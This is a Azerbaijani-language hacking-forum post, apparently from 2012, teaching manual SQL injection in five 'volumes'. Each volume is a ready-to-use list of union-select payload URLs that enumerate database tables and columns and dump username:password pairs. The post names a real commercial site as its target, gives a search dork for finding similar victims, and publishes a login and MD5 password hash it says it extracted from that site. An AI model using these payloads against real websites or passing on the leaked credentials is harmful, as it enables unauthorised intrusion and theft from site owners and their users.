SQL injection Manual Volume 1,2,3,4 + 5[New] With Target Sit

1. Salamlar... Bu Video-da Sadə,qısa 1 üsül ilə bərabər sayt üzərindən SQL manual injection Göstərmişəm... Təzə Üsül Oldu sizə Manual Yolla getməyin 5 üsulu nəsə sualınız olsa Buyurun! Əməyə Hörmət + Enjoy !
2.  
3. [youtube]SQXrwxg2-Es[/youtube]
4.  
5. Source[Volume1]:
6. [code]SQL Injection Manual Volume 1
7.  
8. 0-dan Sona :
9. http://site.com/index.php?id=50
10. http://site.com/index.php?id='50
11. http://site.com/index.php?id=50 order by 52--
12. http://site.com/index.php?id=-50 union all select 1,2,3,4,5,6,7,8,9,10,11--
13. http://site.com/index.php?id=-50 union all select 1,2,version(),4,5,6,7,8,9,10,11--
14. http://site.com/index.php?id=-50 union all select 1,2,table_name,4,5,6,7,8,9,10,11 FROM information_schema.tables--
15. http://site.com/index.php?id=-50 union all select 1,2,column_name,4,5,6,7,8,9,10,11 FROM information_schema.column--
16. http://site.com/index.php?id=-50 union all select 1,2,schema_name,4,5,6,7,8,9,10,11 FROM information_schema.schemata--
17. http://site.com/index.php?id=-50 union all select 1,2,contact(username,0x3,password),4,5,6,7,8,9,10,11 FROM database_name.table_name--
18.  
19. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
20. Volume 1 :
21. Tapdigim columns-larin sayi :
22. # Number of the Columns : 15
23. # Useful : 2
24. # Version : 5.0.77
25. # Table Name : _user
26. # Columns Name : username , password
27. # Result : 0
28. # This way for this site : NO USEFUL!
29. Bu yol alinmadi bu site ucun indi Volume 2-ni yoxlayaq[amma 5-den yuxarilarda ishlekdir...][/code]
30.  
31. Source[Volume2]:
32. [code]SQL Injection Manual Volume 2
33.  
34. 0-dan Sona :
35. http://site.com/index.php?id=5
36. http://site.com/index.php?id='5
37. http://site.com/index.php?id=5 order by 10--
38. http://site.com/index.php?id=-5 union select 1,2,3,4,5,6,7--
39. http://site.com/index.php?id=-5 union select 1,2,@@version,3,4,5,6,7--
40. http://site.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()
41. Google : Text to hex converter
42. Site: http://swingnote.com/tools/texttohex.php
43. http://site.com/index.php?id=-5 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=0xHex(tablenin Hex-i)
44. http://site.com/index.php?id=-5 union select 1,2,group_concat(columnuser,0x3a,columnpass),4,5,6,7 from table
45.  
46. Dork : Text to Hex Converter
47.  
48. Volume 2:
49. # Version : 5.0.77
50. # Table Name : _user
51. # Encode Table Name : 5f75736572
52. # Useful : NOT
53. Demeli bu version-da bu ishlemedi...[/code]
54.  
55. Source[Volume3]:
56. [code]SQL Injection Manual Volume 3
57.  
58. 0-dan Sona :
59. http://site.com/index.php?id=5
60. http://site.com/index.php?id='5
61. http://site.com/index.php?id=5 order by 1--
62. http://site.com/index.php?id=-5 union all select 1,2,3,4,5--
63. http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 2,1--
64. http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 10,1--
65. http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables limit 20,1--
66. http://site.com/index.php?id=-5 union all select 1,2,column_name,4,5 FROM information_schema.columns where(table_name=0xHex)limit 1,1--
67. http://site.com/index.php?id=-5 union all select 1,2,group_concat(admin,0x3a,password),4,5 FROM admin--
68.  
69. # Hex Encode Site : http://mikezilla.com/exp0012.html
70.  
71. Volume 3 :
72. # 5F75736572
73. # Columns - Username , password
74. # Bingo :D Tapildi bu Yol ile olar... Indi 4-cu yola baxaq...
75. [/code]
76.  
77. Source[Volume4]:
78. [code]SQL Injection Manual Volume 4
79.  
80. 0-dan Sona :
81. http://site.com/index.php?id=5
82. http://site.com/index.php?id='5
83. http://site.com/index.php?id=5 order by 1--
84. http://site.com/index.php?id=-5 union all select 1,2,3,4,5--
85. http://site.com/index.php?id=-5 union all select 1,2,table_name,4,5 FROM information_schema.tables--
86. http://site.com/index.php?id=-5 union all select 1,2,column_name,4,5 FROM information_schema.columns where table_name=Char(char code)
87. http://site.com/index.php?id=-5 union all select 1,2,concat(admin,0x3a,password),4,5 FROM admin--
88.  
89. Dork : Convert to ASCII
90.  
91. Volume 4 :
92. # Esas olanlar tapildi... indi ishimizi tekrarlayaq...
93. # Ve Bingo Yene :D
94. # Indi ise bashqa sade ve en asand yolu yoxlayaq...[/code]
95.  
96. Source:
97. [code]++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
98. # Date : 2012:04:25
99. # Subject : SQL injection Manual Volume 1+2+3+4 With [Target Site]
100. # Author : Avatar [Fearless]
101. # Dork : inurl:product.php?id=1
102. # Target Site : www.bcspeakers.com/product.php?id=1
103. # Software : Anti-armenia.ORG // Pirates-Crew.ORG // Pwn.Me :D
104. # Team'Z : AA Team // PC Team // PWN Team :D // The Fear // UG Team
105. # Language : Azerbaijani Language
106. # Localation : Sweden/Sundsvall
107. # Greet'Z to : All member'z of the Team'Z
108. # Respect to : All my Bro'Z!
109. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
110. Let's Start :
111. Salamlar... Bu Gune qeder[Bu gunde daxil olmaqla] sizlere 4 yol/usul gosterdim SQL Injection Manual yolla 4 Volume ve bu gun bunlarin hamisini 1 site-de
112. yoxlayacagiq... men yoxladim perfect amma sadece 1-in indi ise sizinle o birilerinde yoxlayiram diqqetle baxib anlayin... demeli dorkumuz ve sitemiz
113. bulardi.... ilk olaraq 1-ci usuldan bashlayiram
114.  
115. [/code]
116.  
117. Source[Volume5]:
118. [code]++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
119. # Date : 2012:04:25
120. # Subject : SQL injection Manual Volume 5
121. # Author : Avatar [Fearless]
122. # Dork : inurl:product.php?id=1
123. # Target Site : www.bcspeakers.com/product.php?id=1
124. # Software : Anti-armenia.ORG // Pirates-Crew.ORG // Pwn.Me :D
125. # Team'Z : AA Team // PC Team // PWN Team :D // The Fear // UG Team
126. # Language : Azerbaijani Language
127. # Localation : Sweden/Sundsvall
128. # Greet'Z to : All member'z of the Team'Z
129. # Respect to : All my Bro'Z!
130. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
131. Let's Start:
132. Izleyin...
133. # Table Name : _user
134. # Columns Name'z : username , password
135. # Pass+Login : becspeak2803:286adae502ad9d5ab8c4f8644050b448
136. # Pass+Login : becspeak2803:286adae502ad9d5ab8c4f8644050b448
137. # Ve Bingo yene :D buda bashqa 1 usul... Ve sade... indi devam edek
138. # Ve indide gel bunu qiracaq program / site axtar teshekkurler izlediyiniz ucun Video by. Avatar Fearless
139. thank'Z For Watching... Bye ![/code]
140.  
141. 0-dan sona :
142. [code]http://site.com/index.php?id=5
143. http://site.com/index.php?id='5
144. http://site.com/index.php?id=5 order by 10--
145. http://site.com/index.php?id=-5 union all select 1,2,3,4,5--
146. http://site.com/index.php?id=-5 union all select 1,@@version,3,4,5--
147. http://site.com/index.php?id=-5 union all select 1,table_name,3,4,5 from information_schema.tables--
148. http://site.com/index.php?id=-5 union all select 1,column_name,3,4,5 from information_schema.columns--
149. http://site.com/index.php?id=-5 union all select 1,group_concat(username,0x3a,password)3,4,5 from _user
150. [/code]
151.  
152. Site Login + Pass:
153. [code]# Login : becspeak2803
154. # Password : [Nothing]
155. # Password[MD5] : 286adae502ad9d5ab8c4f8644050b448
156. # Target Site : www.bcspeakers.com/
157. # Dork : inurl:product.php?id=1
158. # Open : www.bcspeakers.com/product.php?id=1
159. # Admin Panel : [Not Found][/code]